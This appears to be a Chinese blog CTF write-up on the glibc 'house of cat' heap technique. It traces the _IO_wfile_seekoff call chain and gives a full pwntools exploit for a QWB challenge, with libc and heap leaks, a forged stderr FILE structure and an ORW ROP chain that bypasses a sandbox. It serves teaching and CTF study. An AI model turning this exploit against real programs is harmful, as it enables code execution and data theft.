house_of_cat

前言:

house of cat 这个利用手法和前面提到的 house of kiwi ,和 house of emma 利用的手法是一个链子,当程序无法通过main函数返回时候,或者程序不能显性调用exit函数的时候,我们可以通过 __malloc_assert 来刷新IO流,当然这个函数在2.35之后移除了刷新IO流,最后在2.37彻底移除。

house of cat 和 house of emma 一样修改 vtable表,但是不同的是,house of emma 使用的函数是 _IO_cookie_read来进行跳转,而hosue of cat使用的是_IO_wfile_seekoff来进行函数调用的,这个函数存在 _IO_wfile_jumps中,我们看看它的源码

  1. _IO_wfile_seekoff (FILE *fp, off64_t offset, int dir, int mode)
  2. {
  3. off64_t result;
  4. off64_t delta, new_offset;
  5. long int count;
  6. if (mode == 0)
  7. return do_ftell_wide (fp);
  8. ......
  9. bool was_writing = ((fp->_wide_data->_IO_write_ptr
  10. > fp->_wide_data->_IO_write_base)
  11. || _IO_in_put_mode (fp));
  12. if (was_writing && _IO_switch_to_wget_mode (fp))
  13. return WEOF;
  14. ......
  15. }

发现它会在满足条件的情况下调用 _IO_switch_to_wget_mode 函数,我们继续跟进,查看源码

  1. _IO_switch_to_wget_mode (FILE *fp)
  2. {
  3. if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
  4. if ((wint_t)_IO_WOVERFLOW (fp, WEOF) == WEOF)
  5. return EOF;
  6. ......
  7. }

它会在满足条件的情况下调用 _IO_WOVERFLOW,但是需要满足情况,需要满足fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base 这个条件。因为这个 _IO_WOVERFLOW 函数是通过 _wide_data->_wide_vtable 中所存放的函数指针进行跳转的, 但是_wide_vtable 是我们可控的,从而在这里可以劫持程序的执行流。

看看完整的调用链__malloc_assert-> __fxprintf->__vfxprintf->locked_vfxprintf->__vfprintf_internal->_IO_wfile_seekoff->_IO_switch_to_wget_mode->setcontext->orw

调用我们伪造的vtable

满足条件进行调用_IO_switch_to_wget_mode 函数

继续步入,注意这里rax的变化

这里已经修改过rax+0x18处的地址

继续劫持rdx+0xa0 和rdx+0xa8达到劫持程流序到堆块上(如果没有开沙箱可以之间system("/bin/sh")拿shell。

例题

题目链接:
链接:https://pan.baidu.com/s/1BIOPCJ_nVxN1iWy_m-yWJg?pwd=c7qv 
提取码:c7qv

题目一上来是有检查的,但是我们重心放在house of cat ,这里检查直接给出

登录的时候需要输入 LOGIN | r00t QWB QWXFadmin,在每次堆块操作的时候需要输入CAT | r00t QWB QWXF$\xff 来通过检查

add函数有大小限制,通过calloc来分配

edit函数不能越界,只能使用两次,每次输入0x30字节

free函数存在UAF漏洞

show 函数打印0x30字节数据,没有截断

程序还开了沙箱只能orw,而且read的第一个参数必须是0,那么就是要先要关闭文件描述符0,然后再次使用read

那么思路很明显,通过largebin 来一次泄露libc地址和堆块地址,然后两次edit,第一个修改stderr结构体(以为malloc_assert会调用stderr来输出报错信息),第二次修改top_chunk来修改size来触发 _malloc_assert,那么这里就要注意了伪造结构结构体时候一定要注意布局还有它们之间的调用关系

EXP:

  1. from gt import *
  2. con("amd64")
  3. io = process("./houseofcat")
  4. libc = ELF("/home/su/glibc-all-in-one/libs/2.35-0ubuntu3_amd64/libc-2.35.so")
  5. #gdb.attach(io)
  6. io.sendafter("mew mew mew~~~~~~\n","LOGIN | r00t QWB QWXFadmin")
  7. def add(index,size,msg='\x00'):
  8. io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
  9. io.sendlineafter("choice:\n","1")
  10. io.sendlineafter("cat idx:\n",str(index))
  11. io.sendlineafter("cat size:\n",str(size))
  12. io.sendafter("your content:\n",msg)
  13. def free(index):
  14. io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
  15. io.sendlineafter("choice:\n","2")
  16. io.sendlineafter("cat idx:\n",str(index))
  17. def show(index):
  18. io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
  19. io.sendlineafter("choice:\n","3")
  20. io.sendlineafter("cat idx:\n",str(index))
  21. def edit(index,msg):
  22. io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
  23. io.sendlineafter("choice:\n","4")
  24. io.sendlineafter("cat idx:\n",str(index))
  25. io.sendafter("your content:\n",msg)
  26. add(0,0x420) #0
  27. add(1,0x430) #1
  28. add(2,0x418) #2
  29. free(0)
  30. add(3,0x430) #4
  31. show(0)
  32. io.recvuntil("Context:\n")
  33. libc_base = u64(io.recv(8))-0x21a0d0
  34. suc("libc_base",libc_base)
  35. io.recv(8)
  36. heap_base = u64(io.recv(6).ljust(8,b'\x00')) -0x290
  37. suc("heap_base",heap_base)
  38. setcontext = libc_base + libc.sym["setcontext"]
  39. read = libc_base + libc.sym["read"]
  40. write = libc_base + libc.sym["write"]
  41. pop_rax = libc_base + 0x0000000000045eb0#: pop rax; ret;
  42. pop_rdi = libc_base + 0x000000000002a3e5#: pop rdi; ret;
  43. pop_rsi = libc_base + 0x000000000002be51#: pop rsi; ret;
  44. pop_rdx_r12 = libc_base + 0x000000000011f497#: pop rdx; pop r12; ret;
  45. lv = libc_base + 0x00000000000562ec#: leave; ret;
  46. stderr = libc_base + libc.sym['stderr']
  47. close = libc_base + libc.sym["close"]
  48. syscall = libc_base + 0x0000000000091396#: syscall; ret;
  49. _IO_wfile_jumps = libc_base + 0x2160c0
  50. flag_addr = heap_base + 0xb00 + 0x230
  51. orw = flat(pop_rdi ,0 , close)
  52. orw += flat(pop_rdi,flag_addr,pop_rsi,0,pop_rax,2,syscall)
  53. orw += flat(pop_rdi,0,pop_rsi,heap_base + 0x500,pop_rdx_r12,0x30,0,read)
  54. orw += flat(pop_rdi,1,pop_rsi,heap_base + 0x500,pop_rdx_r12,0x30,0,write)
  55. orw += b'flag\x00\x00\x00\x00' + p64(0xdeadbeef)
  56. fake_io_addr = heap_base + 0xb00
  57. fake_IO_FILE =p64(0)*6
  58. fake_IO_FILE +=p64(1)+p64(0)
  59. fake_IO_FILE +=p64(fake_io_addr+0xb0)#_IO_backup_base=rdx -----> setcontext + 61
  60. fake_IO_FILE +=p64(setcontext+0x3d)#_IO_save_end=call addr rax+0x58
  61. fake_IO_FILE =fake_IO_FILE.ljust(0x58,b'\x00')
  62. fake_IO_FILE +=p64(0) # _chain
  63. fake_IO_FILE =fake_IO_FILE.ljust(0x78,b'\x00')
  64. fake_IO_FILE += p64(heap_base+0x200) # _lock = writable address
  65. fake_IO_FILE = fake_IO_FILE.ljust(0x90,b'\x00')
  66. fake_IO_FILE +=p64(heap_base+0xb30) #rax1
  67. fake_IO_FILE = fake_IO_FILE.ljust(0xB0,b'\x00')
  68. fake_IO_FILE += p64(0)
  69. fake_IO_FILE = fake_IO_FILE.ljust(0xC8,b'\x00')
  70. fake_IO_FILE += p64(libc_base+0x2160c0+0x10) # vtable=_IO_wfile_jumps+0x10
  71. fake_IO_FILE += p64(0) *6
  72. fake_IO_FILE += p64(fake_io_addr + 0x40) #rax2+0xe0
  73. fake_IO_FILE += p64(0) * 7 + p64(fake_io_addr + 0x160) + p64(pop_rdi+1) #rdx + 0xa0 , 0xa8
  74. fake_IO_FILE += orw
  75. free(2)
  76. payload = p64(libc_base+0x21a0d0)*2 +p64(heap_base+0x290) + p64(stderr - 0x20)
  77. add(6,0x418,fake_IO_FILE)
  78. edit(0,payload)
  79. free(6)
  80. add(4,0x430)
  81. #gdb.attach(io)
  82. add(5,0x440) #large
  83. add(7,0x430)
  84. add(8,0x430) #unsort
  85. free(5)
  86. add(9,0x450)
  87. top_chunk = heap_base + 0x28d0
  88. payload = p64(libc_base+0x21a0e0)*2 +p64(heap_base+0x17a0) + p64(top_chunk+3 - 0x20)
  89. edit(5,payload)
  90. free(8)
  91. #add(10,0x460)
  92. #gdb.attach(io)
  93. io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
  94. io.sendlineafter('plz input your cat choice:\n',str(1))
  95. io.sendlineafter('plz input your cat idx:',str(11))
  96. gdb.attach(io,'b* (_IO_wfile_seekoff)')
  97. #gdb.attach(io)
  98. io.sendlineafter('plz input your cat size:',str(0x450))
  99. io.interactive()

分析一下伪造的IO

  1. fake_io_addr = heap_base + 0xb00
  2. fake_IO_FILE =p64(0)*6
  3. fake_IO_FILE +=p64(1)+p64(0) #这里为了绕过检查
  4. fake_IO_FILE +=p64(fake_io_addr+0xb0)#_IO_backup_base=rdx 这里是rdx
  5. fake_IO_FILE +=p64(setcontext+0x3d)#_IO_save_end=call addr 这里是rax + 0x18的位置
  6. fake_IO_FILE =fake_IO_FILE.ljust(0x58,b'\x00')
  7. fake_IO_FILE +=p64(0) # _chain
  8. fake_IO_FILE =fake_IO_FILE.ljust(0x78,b'\x00')
  9. fake_IO_FILE += p64(heap_base+0x200) # _lock = writable address
  10. fake_IO_FILE = fake_IO_FILE.ljust(0x90,b'\x00')
  11. fake_IO_FILE +=p64(heap_base+0xb30) #rax1 0x90位置为第一次的rax (rax+0xa0)
  12. fake_IO_FILE = fake_IO_FILE.ljust(0xB0,b'\x00')
  13. fake_IO_FILE += p64(0)
  14. fake_IO_FILE = fake_IO_FILE.ljust(0xC8,b'\x00')
  15. fake_IO_FILE += p64(libc_base+0x2160c0+0x10) # vtable=_IO_wfile_jumps+0x10
  16. fake_IO_FILE += p64(0) *6
  17. fake_IO_FILE += p64(fake_io_addr + 0x40) #rax2+0xe0
  18. fake_IO_FILE += p64(0) * 7 + p64(fake_io_addr + 0x160) + p64(pop_rdi+1) #rdx + 0xa0 , 0xa8
  19. fake_IO_FILE += orw

 最后执行效果

常回家看看之house_of_cat的更多相关文章

  1. 《Android插件化开发指南》面世

    本书在京东购买地址:https://item.jd.com/31178047689.html 本书Q群:389329264 (一)这是一本什么书 如果只把本书当作纯粹介绍Android插件化技术的书籍 ...

  2. C 基础框架开发

    引言 有的人真的是天命所归 延安时期炸弹 投到他院子都 没炸. 有些事无法改变 是命! 我们也快'老'了, 常回家看看. 前言 扯淡结束了,今天分享的可能有点多,都很简单,但是糅合在一起就是有点复杂. ...

  3. 利用Swoole实现PHP+websocket直播,即使通讯

    websocket Websocket只是一个网络通信协议,就像 http.ftp等都是网络通信的协议一样:相对于HTTP这种非持久的协议来说,Websocket是一个持久化网络通信的协议: WebS ...

  4. 高中最后一刻&大学第一课&为人师的责任

    文章不是技术文,只是分享一些感想,作为一只程序猿,不说好好敲代码,跑出来思考人生,不是合格的程序猿,罪过罪过,自我反思3秒钟,我们继续,毕竟程序猿的人生不只是Coding,也希望自己这点感想被更多刚入 ...

  5. N1试卷常考词汇总结

    免れる まぬがれる 免去,幸免 軽率 けいそつ 轻率,草率 捩れる ねじれる 拧劲儿,扭歪,弯曲 裂ける さける 裂开,破裂 避ける さける 躲避,避开 つまむ 挟,捏,掐 追及 ついきゅう 追上.追 ...

  6. JavaScript 字符串实用常操纪要

    JavaScript 字符串用于存储和处理文本.因此在编写 JS 代码之时她总如影随形,在你处理用户的输入数据的时候,在读取或设置 DOM 对象的属性时,在操作 Cookie 时,在转换各种不同 Da ...

  7. C++常考面试题汇总

    c++面试题 一 用简洁的语言描述 c++ 在 c 语言的基础上开发的一种面向对象编程的语言: 应用广泛: 支持多种编程范式,面向对象编程,泛型编程,和过程化编程:广泛应用于系统开发,引擎开发:支持类 ...

  8. OCP考点实战演练02-日常维护篇

    本系列宗旨:真正掌握OCP考试中所考察的技能,坚决不做Paper OCP! 实验环境:RHEL 6.4 + Oracle 11.2.0.4 OCP考点实战演练02-日常维护篇 1.数据库体系结构和AS ...

  9. c/c++常见面试题

    1. C中static有什么作用 (1)隐藏. 当我们同时编译多个文件时,所有未加static前缀的全局变量和函数都具有全局可见性,故使用static在不同的文件中定义同名函数和同名变量,而不必担心命 ...

  10. flhs笔试题-回家上机实践

    这是最近参加的一个公司的笔试题,回家上机写了下代码,希望对有需要的小伙伴有用,简单实现字符串和数组在指定位置的插入: package org.flhs; import com.google.commo ...

随机推荐

  1. 咬文嚼图式的介绍二叉树、B树/B-树

    前言 因为本人天资愚钝,所以总喜欢将抽象化的事务具象化表达.对于各类眼花缭乱的树,只需要认知到它们只是一种数据结构,类似数组,切片,列表,映射等这些耳熟能详的词汇.对于一个数据结构而言,无非就是增删改 ...

  2. php.ini文件与php.d

    `php.ini` 是 PHP 的主要配置文件,用于全局配置 PHP 的行为和功能.它包含了许多 PHP 的核心设置,如内存限制.错误报告级别.扩展加载等. `php.ini` 文件通常位于 PHP ...

  3. mysql:Windows修改MySQL数据库密码(修改或忘记密码)

    今天练习远程访问数据库时,为了方便访问,就想着把数据库密码改为统一的,以后我们也会经常遇到MySQL需要修改密码的情况,比如密码太简单.忘记密码等等.在这里我就借鉴其他人的方法总结几种修改MySQL密 ...

  4. TIER 2: Oopsie

    TIER 2: Oopsie Web 渗透 此次靶机结合前面知识,非常简单: nmap 扫描,发现 22 和 80 端口开放 服务 80 的 HTTP 服务 之后使用继续 Web 渗透: 使用 Wap ...

  5. sed 进阶使用

    sed 进阶使用 工作原理 sed 维护两个数据缓冲区: 活动模式空间 和 辅助保持空间 两者最初都是空的 sed 通过对每一行输入执行以下循环进行操作 从输入流中读取一行,删除任何尾随的换行符,并将 ...

  6. 阅读翻译Mathematics for Machine Learning之2.8 Affine Subspaces

    阅读翻译Mathematics for Machine Learning之2.8 Affine Subspaces 关于: 首次发表日期:2024-07-24 Mathematics for Mach ...

  7. java面试一日一题:mysql执行delete数据真的被删除了吗

    问题:请讲下mysql执行了delete操作,数据真的被删除了吗 分析:这个问题考察对mysql底层存储的理解. 回答要点: 主要从以下几点去考虑, 1.肯定没有真正删除? 2.为什么这样设计? my ...

  8. Redis内存回收与缓存问题

    内存回收: 1.过期key处理 通过expire命令给key设置ttl Redis本身是KV型数据库,所有数据都存在RedisDB结构体中,其中有两张哈希表 dict:用于存放KV(这里K是K,V是V ...

  9. 解决Sqoop导入导出MySQL数据错位问题

    添加--columns "columns,columns,columns" \可以在hive导入mysql时防止数据错位:

  10. Jenkins如何使用CrumbIssuer防御CSRF攻击

    1.CSRF(跨站请求伪造)概述 在讲解Jenkins的跨站请求伪造(CSRF)保护机制之前,让我们首先对CSRF这一安全威胁及其重要性进行简明扼要的概述. 1.1  CSRF(跨站请求伪造)的原理 ...